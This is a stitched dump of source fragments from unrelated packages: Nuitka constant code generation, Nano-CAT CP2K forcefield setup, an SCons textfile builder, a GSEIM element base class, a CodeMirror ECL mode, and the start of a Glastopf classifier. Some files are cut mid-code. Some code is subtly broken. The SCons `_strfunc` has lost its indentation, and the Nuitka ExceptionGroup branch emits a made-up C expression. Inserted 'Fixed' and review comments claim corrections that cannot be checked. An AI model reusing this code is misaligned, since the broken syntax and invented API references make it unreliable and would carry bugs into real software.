
    def addConstantValue(self, constant_value):
        # Append one constant value to the stream.
        self.pickle.dump(constant_value)
        self.count += 1

    def addBlobData(self, data, name):
        # Append raw blob data, wrapped so code generation emits a pointer.
        self.pickle.dump(BlobData(data, name))
        self.count += 1

    def close(self):
        self.file.close()
class ConstantStreamReader(object):
    """Read constant values back from a stream made by ConstantStreamWriter."""

    def __init__(self, const_file):
        self.pickle = pickle.Unpickler(const_file)
        self.count = 0

    def readConstantValue(self):
        """Return the next constant value from the stream."""
        return self.pickle.load()
class ConstantAccessor(object):
    """Hand out C expressions that give access to constant values.

    Constants mapping onto CPython singletons or type objects get a direct
    C expression; everything else is appended once to the constants stream
    and accessed through the indexed top-level constants table.
    """

    def __init__(self, data_filename, top_level_name):
        # Ordered, so a key's position is its index in the generated C table.
        self.constants = OrderedSet()
        self.constants_writer = ConstantStreamWriter(data_filename)
        # Name of the C array holding the streamed constants.
        self.top_level_name = top_level_name

    def getConstantCode(self, constant):
        """Return the C access expression for *constant*."""
        # Use in user code, or for constants building code itself, many
        # constant types get special code immediately.
        # pylint: disable=too-many-branches,too-many-statements
        if constant is None:
            key = "Py_None"
        elif constant is True:
            key = "Py_True"
        elif constant is False:
            key = "Py_False"
        elif constant is Ellipsis:
            key = "Py_Ellipsis"
        elif constant is NotImplemented:
            key = "Py_NotImplemented"
        elif constant is sys.version_info:
            key = "Py_SysVersionInfo"
        elif type(constant) is type:
            # TODO: Maybe make this a mapping in nuitka.Builtins
            if constant is type(None):
                # Fixed: previously tested "constant is None", which can never
                # be true here (None is handled above), so NoneType fell
                # through to the generic case and produced the non-existent
                # "PyNonetype_Type".
                key = "(PyObject *)Py_TYPE(Py_None)"
            elif constant is object:
                key = "(PyObject *)&PyBaseObject_Type"
            elif constant is staticmethod:
                key = "(PyObject *)&PyStaticMethod_Type"
            elif constant is classmethod:
                key = "(PyObject *)&PyClassMethod_Type"
            elif constant is bytearray:
                key = "(PyObject *)&PyByteArray_Type"
            elif constant is enumerate:
                key = "(PyObject *)&PyEnum_Type"
            elif constant is frozenset:
                key = "(PyObject *)&PyFrozenSet_Type"
            elif python_version >= 0x270 and constant is memoryview:
                key = "(PyObject *)&PyMemoryView_Type"
            elif python_version < 0x300 and constant is basestring:
                key = "(PyObject *)&PyBaseString_Type"
            elif python_version < 0x300 and constant is xrange:
                key = "(PyObject *)&PyRange_Type"
            elif constant in builtin_anon_values:
                key = "(PyObject *)" + builtin_anon_codes[builtin_anon_values[constant]]
            elif constant in builtin_exception_values_list:
                key = "(PyObject *)PyExc_%s" % constant.__name__
            elif constant is ExceptionGroup:
                key = "(PyObject *)_PyInterpreterState_GET()->exc_state.PyExc_ExceptionGroup"
            elif constant is BaseExceptionGroup:
                key = "(PyObject *)PyExc_BaseExceptionGroup"
            else:
                # Generic built-in type object; the C names differ from the
                # Python names for "int" and "str" depending on the version.
                type_name = constant.__name__
                if constant is int and python_version >= 0x300:
                    type_name = "long"
                elif constant is str:
                    type_name = "string" if python_version < 0x300 else "unicode"
                key = "(PyObject *)&Py%s_Type" % type_name.capitalize()
        else:
            key = "const_" + namifyConstant(constant)

        # Stream the constant value only the first time it is seen.
        if key not in self.constants:
            self.constants.add(key)
            self.constants_writer.addConstantValue(constant)

        key = "%s[%d]" % (self.top_level_name, self.constants.index(key))
        # TODO: Make it returning, more clear.
        return key

    def getBlobDataCode(self, data, name):
        """Return the C access expression for raw blob *data*."""
        key = "blob_" + namifyConstant(data)
        if key not in self.constants:
            self.constants.add(key)
            self.constants_writer.addBlobData(data=data, name=name)
        key = "%s[%d]" % (self.top_level_name, self.constants.index(key))
        return key

    def getConstantsCount(self):
        # Make sure to add no more after asking this.
        self.constants_writer.close()
        return len(self.constants)
/Nano-CAT-0.7.2.tar.gz/Nano-CAT-0.7.2/nanoCAT/qd_opt_ff.py | import os
import warnings
from functools import wraps
from collections import abc
from typing import (
Collection, Iterable, Union, Dict, Tuple, List, Optional, Type, Callable
)
import numpy as np
import pandas as pd
from scm.plams import Molecule, Settings
from scm.plams.core.basejob import Job
from scm.plams.core.results import Results
from FOX import PSFContainer
from FOX.ff.lj_uff import combine_sigma, combine_epsilon
from .ff.cp2k_utils import set_cp2k_element
__all__ = ['qd_opt_ff']
def qd_opt_ff(mol: Molecule, jobs: Tuple[Optional[Type[Job]], ...],
              settings: Tuple[Optional[Settings], ...], name: str = 'QD_opt',
              new_psf: bool = False, job_func: Callable = Molecule.job_geometry_opt) -> Results:
    """Alternative implementation of :func:`.qd_opt` using CP2Ks' classical forcefields.

    Performs an inplace update of **mol**.

    Parameters
    ----------
    mol : |plams.Molecule|_
        The to-be optimized molecule.

    jobs : :class:`tuple`
        A tuple of |plams.Job| types and/or ``None``; only the first item is used.

    settings : :class:`tuple`
        A tuple of |plams.Settings| types and/or ``None``; only the first item is used.

    name : str
        The name of the job.

    new_psf : bool
        If ``True``, (re)generate the .psf file even when one already exists.

    job_func : :class:`Callable`
        The PLAMS job method to run, *e.g.* :meth:`Molecule.job_geometry_opt`.

    Returns
    -------
    |plams.Results|_
        The results instance produced by **job_func**.

    See Also
    --------
    :func:`CAT.attachment.qd_opt.qd_opt`
        Default workflow for optimizing molecules.

    """
    psf_name = os.path.join(mol.properties.path, mol.properties.name + '.psf')

    # Prepare the job settings
    job = jobs[0] if isinstance(jobs, abc.Sequence) else jobs
    s = Settings(settings[0]) if isinstance(settings, abc.Sequence) else Settings(settings)
    # Hard-link the .psf/.prm files into the job directory under the job name.
    s.runscript.pre = (f'ln "{psf_name}" ./"{name}.psf"\n'
                       f'ln "{mol.properties.prm}" ./"{name}.prm"')
    s.input.force_eval.subsys.topology.conn_file_name = f'{name}.psf'
    s.input.force_eval.mm.forcefield.parm_file_name = f'{name}.prm'
    set_cp2k_element(s, mol)

    if not os.path.isfile(psf_name) or new_psf:
        psf = get_psf(mol, s.input.force_eval.mm.forcefield.get('charge', None))
        # Mirror the PSF charges and atom types onto the PLAMS atoms.
        for at, charge, symbol in zip(mol, psf.charge, psf.atom_type):
            at.properties.charge_float = charge
            at.properties.symbol = symbol
        psf.write(psf_name)

    # Pull any missing non-covalent parameters from UFF
    if s.input.force_eval.mm.forcefield.nonbonded.get('lennard-jones', None):
        try:
            finalize_lj(mol, s.input.force_eval.mm.forcefield.nonbonded['lennard-jones'])
        except TypeError:
            pass  # NOTE(review): silently skips UFF supplementation -- confirm intent

    results = job_func(mol, job, s, name=name, read_template=False, ret_results=True)
    mol.round_coords()
    return results
def get_psf(mol: Molecule, charges: Union[None, Settings, Iterable[Settings]]) -> PSFContainer:
    """Construct and return a :class:`PSF` instance.

    .. _CHARGE: https://manual.cp2k.org/trunk/CP2K_INPUT/FORCE_EVAL/MM/FORCEFIELD/CHARGE.html

    Parameters
    ----------
    mol : |plams.Molecule|_
        A PLAMS molecule which will be used for constructing the :class:`PSFContainer` instance.

    charges : |plams.Settings|_ or |Iterable|_ [|plams.Settings|_], optional
        Settings constructed from the CP2K FORCE_EVAL/MM/FORCEFIELD/CHARGE_ block.
        Each item is expected to contain the ``"charge"`` and ``"atom"`` keys;
        ``None`` leaves the auto-generated charges untouched.

    Returns
    -------
    |nanoCAT.PSFContainer|_
        The PSF topology for **mol**, with user charges applied and the total
        molecular charge re-constrained to its initial value.

    """
    # Construct a PSF instance
    psf = PSFContainer()
    psf.generate_bonds(mol)
    psf.generate_angles(mol)
    psf.generate_dihedrals(mol)
    psf.generate_impropers(mol)
    psf.generate_atoms(mol)

    # Update charges based on charges which have been explictly specified by the user
    initial_charge = psf.charge.sum()
    if isinstance(charges, Settings):
        charge_dict = {charges.atom: charges.charge}
    elif isinstance(charges, abc.Iterable):
        charge_dict = {i.atom: i.charge for i in charges}
    elif charges is None:
        # No user overrides: keep the generated charges as-is.
        return psf
    else:
        raise TypeError(f"The parameter 'charges' is of invalid type: {repr(type(charges))}")
    for at, charge in charge_dict.items():
        psf.update_atom_charge(at, float(charge))

    # Update atomic charges in order to reset the molecular charge to its initial value
    constrain_charge(psf, initial_charge, charge_dict)
    return psf
def constrain_charge(psf: "PSFContainer", initial_charge: float = 0.0,
                     atom_set: Optional[Collection[str]] = None) -> None:
    """Set the total molecular charge of **psf** to **initial_charge**.

    Atoms in **psf** whose atom type intersects with **atom_set** will *not*
    be altered; the required correction is distributed evenly over all other
    atoms.

    Parameters
    ----------
    psf : |nanoCAT.PSFContainer|_
        A :class:`.PSF` instance with newly updated charges and/or atom types.

    initial_charge : float
        The initial charge of the system before the updating of atomic charges.

    atom_set : |Container|_ [|str|_], optional
        A container with atom types.
        Any atom in **psf** whose atom type intersects with **atom_set** will
        *not* be altered.

    """
    # Check if the molecular charge has remained unchanged.
    # Fixed: this previously compared ``abs(new) - abs(initial)``, which is
    # negative (and thus always below the threshold) whenever the new charge
    # is smaller in magnitude than the initial one, silently skipping the
    # correction (e.g. new=2, initial=3, or new=-5, initial=5).
    new_charge = psf.charge.sum()
    if abs(new_charge - initial_charge) < 1e-8:
        return

    # Boolean mask of the atoms whose charge may be adjusted.
    if atom_set is None:
        atom_subset = np.ones(len(psf.atoms), dtype=bool)
    else:
        atom_set_ = set(atom_set)
        atom_subset = np.array([at not in atom_set_ for at in psf.atom_type])

    # Spread the missing charge evenly over all adjustable atoms.
    charge_correction = initial_charge - psf.charge.sum()
    charge_correction /= np.count_nonzero(atom_subset)
    with pd.option_context('mode.chained_assignment', None):
        psf.charge[atom_subset] += charge_correction
@wraps(constrain_charge)
def _constrain_charge(*args, **kwargs):
    """Deprecated alias of :func:`constrain_charge`."""
    warnings.warn(
        "_constrain_charge() is deprecated; use constrain_charge() from now on",
        category=DeprecationWarning,
    )
    return constrain_charge(*args, **kwargs)
def finalize_lj(mol: Molecule, s: List[Settings]) -> None:
    """Assign UFF Lennard-Jones parameters to all missing non-bonded core/ligand interactions.

    .. _LENNARD_JONES: https://manual.cp2k.org/trunk/CP2K_INPUT/FORCE_EVAL/MM/FORCEFIELD/NONBONDED/LENNARD-JONES.html

    Parameters
    ----------
    mol : |plams.Molecule|_
        A PLAMS molecule containing a core and ligand(s).

    s : |list|_ [|plams.Settings|_]
        A list of settings constructed from the
        CP2K FORCE_EVAL/MM/FORCEFIELD/NONBONDED/`LENNARD-JONES`_ block.
        The settings are expected to contain the ``"atoms"`` keys.

    """  # noqa
    # Create a set of all core atom types
    core_at, lig_at = _gather_core_lig_symbols(mol)

    # Create a set of all user-specified core/ligand LJ pairs
    # NOTE(review): rebinding ``s`` here means appended pairs are lost to the
    # caller when ``s`` arrives falsy or as a single dict -- the in-place
    # update only propagates when a real list is passed; confirm callers.
    if not s:
        s = []
    elif isinstance(s, dict):
        s = [s]
    # The comprehension's loop variable deliberately shadows ``s``; each
    # element is itself a Settings carrying an ``atoms`` pair string.
    atom_pairs = {frozenset(s.atoms.split()) for s in s}

    # Check if LJ parameters are present for all atom pairs.
    # If not, supplement them with UFF parameters.
    for at1, symbol1 in core_at.items():
        for at2, symbol2 in lig_at.items():
            at1_at2 = {at1, at2}
            if at1_at2 in atom_pairs:
                continue
            # Lorentz-Berthelot-style combination of the UFF parameters.
            s.append(Settings({
                'atoms': f'{at1} {at2}',
                'epsilon': f'[kcalmol] {round(combine_epsilon(symbol1, symbol2), 4)}',
                'sigma': f'[angstrom] {round(combine_sigma(symbol1, symbol2), 4)}'
            }))
def _gather_core_lig_symbols(mol: Molecule) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Create two dictionaries with atom types and atomic symbols.

    Both dictionaries map atom types to matching atomic symbols;
    dictionary #1 for the core and #2 for the ligand(s).

    Cores (``"COR"``) and ligands (``"LIG"``) are distinguished based on the value of each atoms'
    :attr:`Atom.properties` ``["pdb_info"]["ResidueName"]`` attribute.
    Assumes all core atoms precede the ligand atoms and that one full ligand
    is representative of all ligands.
    """
    iterator = iter(mol)
    core_at = {}
    lig_at = {}

    # Fill the set with all core atom types
    # NOTE(review): core entries are keyed on the element symbol, while the
    # ligand entries below are keyed on ``at.properties.symbol`` (the custom
    # atom type, presumably set by qd_opt_ff) -- confirm this asymmetry is
    # intentional.
    for at in iterator:  # Iterate until the first ligand is encountered
        if at.properties.pdb_info.ResidueName != 'COR':
            break
        if at.symbol not in core_at:
            core_at[at.symbol] = at.symbol

    # Fill the set with all ligand atom types
    # ``at`` is now the first ligand atom left over from the loop above.
    res_number = at.properties.pdb_info.ResidueNumber
    lig_at[at.properties.symbol] = at.symbol
    for at in iterator:  # Iterate through a single ligand until the next ligand is encountered
        if at.properties.pdb_info.ResidueNumber != res_number:
            break
        if at.symbol not in lig_at:
            lig_at[at.properties.symbol] = at.symbol

    return core_at, lig_at
/Nuitka_fixed-1.1.2-cp310-cp310-win_amd64.whl/nuitka/build/inline_copy/lib/scons-4.4.0/SCons/Tool/textfile.py | import SCons
from SCons.Node import Node
from SCons.Node.Python import Value
from SCons.Util import is_String, is_Sequence, is_Dict, to_bytes
# File mode for generated targets; a 'b' mode would switch _do_subst/_action
# to bytes handling.
TEXTFILE_FILE_WRITE_MODE = 'w'

# Default line separator: a fixed '\n' (not os.linesep) for reproducible output.
LINESEP = '\n'
def _do_subst(node, subs):
    """
    Fetch the node contents and replace all instances of the keys with
    their values. For example, if subs is
    {'%VERSION%': '1.2345', '%BASE%': 'MyProg', '%prefix%': '/bin'},
    then all instances of %VERSION% in the file will be replaced with
    1.2345 and so forth.
    """
    contents = node.get_text_contents()
    if subs:
        for key, replacement in subs:
            contents = contents.replace(key, replacement)
    if 'b' not in TEXTFILE_FILE_WRITE_MODE:
        return contents
    # Binary mode: hand back a bytes buffer instead of text.
    try:
        return bytearray(contents, 'utf-8')
    except TypeError:
        # TODO: this should not happen, get_text_contents returns text
        return bytearray(contents)
def _action(target, source, env):
    """Builder action: write every source node, substituted, into target[0]."""
    # prepare the line separator
    linesep = env['LINESEPARATOR']
    if linesep is None:
        linesep = LINESEP  # os.linesep
    elif is_String(linesep):
        pass
    elif isinstance(linesep, Value):
        linesep = linesep.get_text_contents()
    else:
        raise SCons.Errors.UserError('unexpected type/class for LINESEPARATOR: %s'
                                     % repr(linesep), None)

    if 'b' in TEXTFILE_FILE_WRITE_MODE:
        linesep = to_bytes(linesep)

    # create a dictionary to use for the substitutions
    if 'SUBST_DICT' not in env:
        subs = None  # no substitutions
    else:
        subst_dict = env['SUBST_DICT']
        if is_Dict(subst_dict):
            subst_dict = list(subst_dict.items())
        elif is_Sequence(subst_dict):
            pass
        else:
            raise SCons.Errors.UserError('SUBST_DICT must be dict or sequence')
        subs = []
        for (k, value) in subst_dict:
            if callable(value):
                # Callables are evaluated lazily, at build time.
                value = value()
            if is_String(value):
                # Expand construction variables inside string replacements.
                value = env.subst(value, raw=1)
            else:
                value = str(value)
            subs.append((k, value))

    # write the file
    try:
        target_file = open(target[0].get_path(), TEXTFILE_FILE_WRITE_MODE, newline='')
    except (OSError, IOError) as e:
        raise SCons.Errors.UserError("Can't write target file %s [%s]" % (target[0],e))

    # separate lines by 'linesep' only if linesep is not empty
    lsep = None
    for line in source:
        if lsep:
            target_file.write(lsep)
        target_file.write(_do_subst(line, subs))
        lsep = linesep
    target_file.close()
def _strfunc(target, source, env):
return "Creating '%s'" % target[0]
def _convert_list_R(newlist, sources):
    """Recursively flatten *sources* into *newlist*, wrapping raw values
    (non-Node, non-sequence items) in Value nodes."""
    for item in sources:
        if is_Sequence(item):
            _convert_list_R(newlist, item)
            continue
        newlist.append(item if isinstance(item, Node) else Value(item))
def _convert_list(target, source, env):
    """Emitter: enforce a single target and flatten/wrap the source list."""
    if len(target) != 1:
        raise SCons.Errors.UserError("Only one target file allowed")
    flattened = []
    _convert_list_R(flattened, source)
    return target, flattened
# Construction variables whose changes trigger a rebuild of the target.
_common_varlist = ['SUBST_DICT', 'LINESEPARATOR']

_text_varlist = _common_varlist + ['TEXTFILEPREFIX', 'TEXTFILESUFFIX']
# Textfile: builds a file from Value nodes given directly in the SConscript.
_text_builder = SCons.Builder.Builder(
    action=SCons.Action.Action(_action, _strfunc, varlist=_text_varlist),
    source_factory=Value,
    emitter=_convert_list,
    prefix='$TEXTFILEPREFIX',
    suffix='$TEXTFILESUFFIX',
)

_subst_varlist = _common_varlist + ['SUBSTFILEPREFIX', 'SUBSTFILESUFFIX']
# Substfile: builds a file by substituting SUBST_DICT entries into source files.
_subst_builder = SCons.Builder.Builder(
    action=SCons.Action.Action(_action, _strfunc, varlist=_subst_varlist),
    source_factory=SCons.Node.FS.File,
    emitter=_convert_list,
    prefix='$SUBSTFILEPREFIX',
    suffix='$SUBSTFILESUFFIX',
    src_suffix=['.in'],
)
def generate(env):
    """Add the Textfile/Substfile builders and their construction variables
    to the environment."""
    env['LINESEPARATOR'] = LINESEP  # os.linesep
    builders = env['BUILDERS']
    builders['Textfile'] = _text_builder
    env['TEXTFILEPREFIX'] = ''
    env['TEXTFILESUFFIX'] = '.txt'
    builders['Substfile'] = _subst_builder
    env['SUBSTFILEPREFIX'] = ''
    env['SUBSTFILESUFFIX'] = ''
def exists(env):
    """Tool availability check: these builders are always available."""
    return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | PypiClean |
/GSEIM-1.4.tar.gz/GSEIM-1.4/src/grc/core/base.py |
import weakref
from .utils.descriptors import lazy_property
class Element(object):
    """Base class for every element in a flow-graph model.

    Provides parent/child tree navigation, validation with collected error
    messages, and cached lookups of specific ancestor types.
    """

    def __init__(self, parent=None):
        # A weak reference avoids parent<->child reference cycles; calling
        # self._parent() yields None when no parent was given or it is gone.
        self._parent = weakref.ref(parent) if parent else lambda: None
        self._error_messages = []

    ##################################################
    # Element Validation API
    ##################################################
    def validate(self):
        """
        Validate this element and call validate on all children.
        Call this base method before adding error messages in the subclass.
        """
        del self._error_messages[:]
        for child in self.children():
            child.validate()

    def is_valid(self):
        """
        Is this element valid?

        Returns:
            true when the element is enabled and has no error messages or is bypassed
        """
        # Valid iff iter_error_messages() yields nothing (falsy default).
        return not next(self.iter_error_messages(), False)

    def add_error_message(self, msg):
        """
        Add an error message to the list of errors.

        Args:
            msg: the error message string
        """
        self._error_messages.append(msg)

    def get_error_messages(self):
        """
        Get the list of error messages from this element and all of its children.
        Do not include the error messages from disabled or bypassed children.
        Cleverly indent the children error messages for printing purposes.

        Returns:
            a list of error message strings
        """
        return [msg if elem is self else "{}:\n\t{}".format(elem, msg.replace("\n", "\n\t"))
                for elem, msg in self.iter_error_messages()]

    def iter_error_messages(self):
        """
        Iterate over error messages. Yields tuples of (element, message)
        """
        # Fixed: removed a leftover debug print() that echoed every message
        # to stdout on each iteration.
        for msg in self._error_messages:
            yield self, msg
        for child in self.children():
            for element_msg in child.iter_error_messages():
                yield element_msg

    def rewrite(self):
        """
        Rewrite this element and call rewrite on all children.
        Call this base method before rewriting the element.
        """
        for child in self.children():
            child.rewrite()

    @property
    def enabled(self):
        # The base element is always enabled; subclasses may override.
        return True

    ##################################################
    # Tree-like API
    ##################################################
    @property
    def parent(self):
        return self._parent()

    def get_parent_by_type(self, cls):
        """Return the nearest ancestor that is an instance of *cls*, or None."""
        parent = self.parent
        if parent is None:
            return None
        elif isinstance(parent, cls):
            return parent
        else:
            return parent.get_parent_by_type(cls)

    @lazy_property
    def parent_platform(self):
        from .platform import Platform
        return self.get_parent_by_type(Platform)

    @lazy_property
    def parent_flowgraph(self):
        from .FlowGraph import FlowGraph
        return self.get_parent_by_type(FlowGraph)

    @lazy_property
    def parent_block(self):
        from .blocks import Block
        return self.get_parent_by_type(Block)

    def reset_parents_by_type(self):
        """Reset all lazy properties"""
        # Fixed: iterating vars(Element) directly yields only the attribute
        # *names* (strings), so the two-value unpacking raised ValueError;
        # .items() provides the intended (name, attribute) pairs.
        for name, obj in vars(Element).items():  # explicitly only in Element, not subclasses
            if isinstance(obj, lazy_property):
                try:
                    delattr(self, name)
                except AttributeError:
                    pass  # lazy value was never computed on this instance

    def children(self):
        # Default: no children (empty generator).
        return
        yield  # empty generator

    ##################################################
    # Type testing
    ##################################################
    is_flow_graph = False
    is_block = False
    is_dummy_block = False
    is_connection = False
    is_port = False
    is_param = False
    is_variable = False
    is_import = False
    is_snippet = False

    def get_raw(self, name):
        """Return the raw (un-evaluated) value behind evaluated property *name*."""
        descriptor = getattr(self.__class__, name, None)
        if not descriptor:
            raise ValueError("No evaluated property '{}' found".format(name))
        return getattr(self, descriptor.name_raw, None) or getattr(self, descriptor.name, None)

    def set_evaluated(self, name, value):
        """Store *value* in the instance dict as the evaluated property *name*."""
        descriptor = getattr(self.__class__, name, None)
        if not descriptor:
            raise ValueError("No evaluated property '{}' found".format(name))
        self.__dict__[descriptor.name] = value
/FlaskCms-0.0.4.tar.gz/FlaskCms-0.0.4/flask_cms/static/js/ckeditor/plugins/codemirror/js/mode/ecl/ecl.js |
// UMD wrapper: register under CommonJS, AMD, or a global CodeMirror.
(function(mod) {
  if (typeof exports == "object" && typeof module == "object") // CommonJS
    mod(require("../../lib/codemirror"));
  else if (typeof define == "function" && define.amd) // AMD
    define(["../../lib/codemirror"], mod);
  else // Plain browser env
    mod(CodeMirror);
})(function(CodeMirror) {
"use strict";

// Highlighting mode for ECL (Enterprise Control Language, HPCC Systems).
CodeMirror.defineMode("ecl", function(config) {

  // Build a lookup object (word -> true) from a space-separated word list.
  function words(str) {
    var obj = {}, words = str.split(" ");
    for (var i = 0; i < words.length; ++i) obj[words[i]] = true;
    return obj;
  }

  // '#' directives: highlight the rest of the line as "meta", but only when
  // the '#' starts the line's first token.
  function metaHook(stream, state) {
    if (!state.startOfLine) return false;
    stream.skipToEnd();
    return "meta";
  }

  var indentUnit = config.indentUnit;
  // Word classes, each mapped to its own highlighting style in tokenBase().
  var keyword = words("abs acos allnodes ascii asin asstring atan atan2 ave case choose choosen choosesets clustersize combine correlation cos cosh count covariance cron dataset dedup define denormalize distribute distributed distribution ebcdic enth error evaluate event eventextra eventname exists exp failcode failmessage fetch fromunicode getisvalid global graph group hash hash32 hash64 hashcrc hashmd5 having if index intformat isvalid iterate join keyunicode length library limit ln local log loop map matched matchlength matchposition matchtext matchunicode max merge mergejoin min nolocal nonempty normalize parse pipe power preload process project pull random range rank ranked realformat recordof regexfind regexreplace regroup rejected rollup round roundup row rowdiff sample set sin sinh sizeof soapcall sort sorted sqrt stepped stored sum table tan tanh thisnode topn tounicode transfer trim truncate typeof ungroup unicodeorder variance which workunit xmldecode xmlencode xmltext xmlunicode");
  var variable = words("apply assert build buildindex evaluate fail keydiff keypatch loadxml nothor notify output parallel sequential soapcall wait");
  var variable_2 = words("__compressed__ all and any as atmost before beginc++ best between case const counter csv descend encrypt end endc++ endmacro except exclusive expire export extend false few first flat from full function group header heading hole ifblock import in interface joined keep keyed last left limit load local locale lookup macro many maxcount maxlength min skew module named nocase noroot noscan nosort not of only opt or outer overwrite packed partition penalty physicallength pipe quote record relationship repeat return right scan self separator service shared skew skip sql store terminator thor threshold token transform trim true type unicodeorder unsorted validate virtual whole wild within xml xpath");
  // Data type names; these may also carry a width suffix, e.g. STRING20.
  var variable_3 = words("ascii big_endian boolean data decimal ebcdic integer pattern qstring real record rule set of string token udecimal unicode unsigned varstring varunicode");
  var builtin = words("checkpoint deprecated failcode failmessage failure global independent onwarning persist priority recovery stored success wait when");
  var blockKeywords = words("catch class do else finally for if switch try while");
  var atoms = words("true false null");
  var hooks = {"#": metaHook};
  // NOTE(review): never assigned anywhere in this mode -- always undefined,
  // so unterminated single-line strings end at the line break.
  var multiLineStrings;
  var isOperatorChar = /[+\-*&%=<>!?|\/]/;
  // Punctuation seen by the most recent token() call; drives indentation.
  var curPunc;

  // Main tokenizer: classify the next token on the stream.
  function tokenBase(stream, state) {
    var ch = stream.next();
    // Give registered hooks (currently only '#') the first chance.
    if (hooks[ch]) {
      var result = hooks[ch](stream, state);
      if (result !== false) return result;
    }
    // String literals switch to the dedicated string tokenizer.
    if (ch == '"' || ch == "'") {
      state.tokenize = tokenString(ch);
      return state.tokenize(stream, state);
    }
    // Plain punctuation is recorded for the indenter but not styled.
    if (/[\[\]{}\(\),;\:\.]/.test(ch)) {
      curPunc = ch;
      return null;
    }
    // Numbers (integer/decimal).
    if (/\d/.test(ch)) {
      stream.eatWhile(/[\w\.]/);
      return "number";
    }
    // Comments: block (/* ... */) or line (// ...).
    if (ch == "/") {
      if (stream.eat("*")) {
        state.tokenize = tokenComment;
        return tokenComment(stream, state);
      }
      if (stream.eat("/")) {
        stream.skipToEnd();
        return "comment";
      }
    }
    if (isOperatorChar.test(ch)) {
      stream.eatWhile(isOperatorChar);
      return "operator";
    }
    // Otherwise: an identifier/word; ECL keywords are case-insensitive.
    stream.eatWhile(/[\w\$_]/);
    var cur = stream.current().toLowerCase();
    if (keyword.propertyIsEnumerable(cur)) {
      if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
      return "keyword";
    } else if (variable.propertyIsEnumerable(cur)) {
      if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
      return "variable";
    } else if (variable_2.propertyIsEnumerable(cur)) {
      if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
      return "variable-2";
    } else if (variable_3.propertyIsEnumerable(cur)) {
      if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
      return "variable-3";
    } else if (builtin.propertyIsEnumerable(cur)) {
      if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
      return "builtin";
    } else { //Data types are of from KEYWORD##
      // Strip a trailing numeric/underscore suffix and retry as a data type,
      // so e.g. "string20" still highlights like "string".
      var i = cur.length - 1;
      while(i >= 0 && (!isNaN(cur[i]) || cur[i] == '_'))
        --i;
      if (i > 0) {
        var cur2 = cur.substr(0, i + 1);
        if (variable_3.propertyIsEnumerable(cur2)) {
          if (blockKeywords.propertyIsEnumerable(cur2)) curPunc = "newstatement";
          return "variable-3";
        }
      }
    }
    if (atoms.propertyIsEnumerable(cur)) return "atom";
    return null;
  }

  // Tokenizer for a string delimited by *quote*, honoring backslash escapes.
  function tokenString(quote) {
    return function(stream, state) {
      var escaped = false, next, end = false;
      while ((next = stream.next()) != null) {
        if (next == quote && !escaped) {end = true; break;}
        escaped = !escaped && next == "\\";
      }
      // Return to the base tokenizer unless the string may span lines.
      if (end || !(escaped || multiLineStrings))
        state.tokenize = tokenBase;
      return "string";
    };
  }

  // Tokenizer for the inside of a /* ... */ block comment.
  function tokenComment(stream, state) {
    var maybeEnd = false, ch;
    while (ch = stream.next()) {
      if (ch == "/" && maybeEnd) {
        state.tokenize = tokenBase;
        break;
      }
      maybeEnd = (ch == "*");
    }
    return "comment";
  }

  // One frame of the indentation context stack.
  function Context(indented, column, type, align, prev) {
    this.indented = indented;   // indentation of the line opening the context
    this.column = column;       // column of the opening token
    this.type = type;           // expected closing token or "top"/"statement"
    this.align = align;         // align continuations to the opening column?
    this.prev = prev;           // enclosing context
  }
  function pushContext(state, col, type) {
    return state.context = new Context(state.indented, col, type, null, state.context);
  }
  function popContext(state) {
    var t = state.context.type;
    if (t == ")" || t == "]" || t == "}")
      state.indented = state.context.indented;
    return state.context = state.context.prev;
  }

  // Interface
  return {
    startState: function(basecolumn) {
      return {
        tokenize: null,
        context: new Context((basecolumn || 0) - indentUnit, 0, "top", false),
        indented: 0,
        startOfLine: true
      };
    },

    token: function(stream, state) {
      var ctx = state.context;
      if (stream.sol()) {
        if (ctx.align == null) ctx.align = false;
        state.indented = stream.indentation();
        state.startOfLine = true;
      }
      if (stream.eatSpace()) return null;
      curPunc = null;
      var style = (state.tokenize || tokenBase)(stream, state);
      if (style == "comment" || style == "meta") return style;
      if (ctx.align == null) ctx.align = true;

      // Maintain the context stack from the punctuation just consumed.
      if ((curPunc == ";" || curPunc == ":") && ctx.type == "statement") popContext(state);
      else if (curPunc == "{") pushContext(state, stream.column(), "}");
      else if (curPunc == "[") pushContext(state, stream.column(), "]");
      else if (curPunc == "(") pushContext(state, stream.column(), ")");
      else if (curPunc == "}") {
        while (ctx.type == "statement") ctx = popContext(state);
        if (ctx.type == "}") ctx = popContext(state);
        while (ctx.type == "statement") ctx = popContext(state);
      }
      else if (curPunc == ctx.type) popContext(state);
      else if (ctx.type == "}" || ctx.type == "top" || (ctx.type == "statement" && curPunc == "newstatement"))
        pushContext(state, stream.column(), "statement");
      state.startOfLine = false;
      return style;
    },

    indent: function(state, textAfter) {
      if (state.tokenize != tokenBase && state.tokenize != null) return 0;
      var ctx = state.context, firstChar = textAfter && textAfter.charAt(0);
      if (ctx.type == "statement" && firstChar == "}") ctx = ctx.prev;
      var closing = firstChar == ctx.type;
      if (ctx.type == "statement") return ctx.indented + (firstChar == "{" ? 0 : indentUnit);
      else if (ctx.align) return ctx.column + (closing ? 0 : 1);
      else return ctx.indented + (closing ? 0 : indentUnit);
    },

    electricChars: "{}"
  };
});

CodeMirror.defineMIME("text/x-ecl", "ecl");

});
/Glastopf-3.1.2.tar.gz/Glastopf-3.1.2/glastopf/modules/classification/request.py |
import re
import os
import urlparse
import urllib2
from xml.dom.minidom import parse
import glastopf.modules.classification.sql as sql
package_directory = os.path.dirname(os.path.abspath(__file__))
class RequestPattern(object):
    """Value object describing one attack pattern from ``requests.xml``."""

    def __init__(self, pattern_id, string, description, module):
        self.id = pattern_id
        self.module = module
        self.string = string
        self.description = description
class Classifier(object):
    """Classify incoming HTTP requests by matching them against the attack
    patterns defined in ``requests.xml``."""

    # FIXME: Error handling for errors in the xml file
    def __init__(self, data_dir=os.path.join(os.getcwd(), 'data')):
        """Load the pattern tree and prepare the sandbox file-serving dir."""
        # TODO: check if file exists
        # ugly but it works...
        requests_file = os.path.join(package_directory, '../../requests.xml')
        self.tree = parse(requests_file)
        self.server_files_path = os.path.join(data_dir, 'server_files')
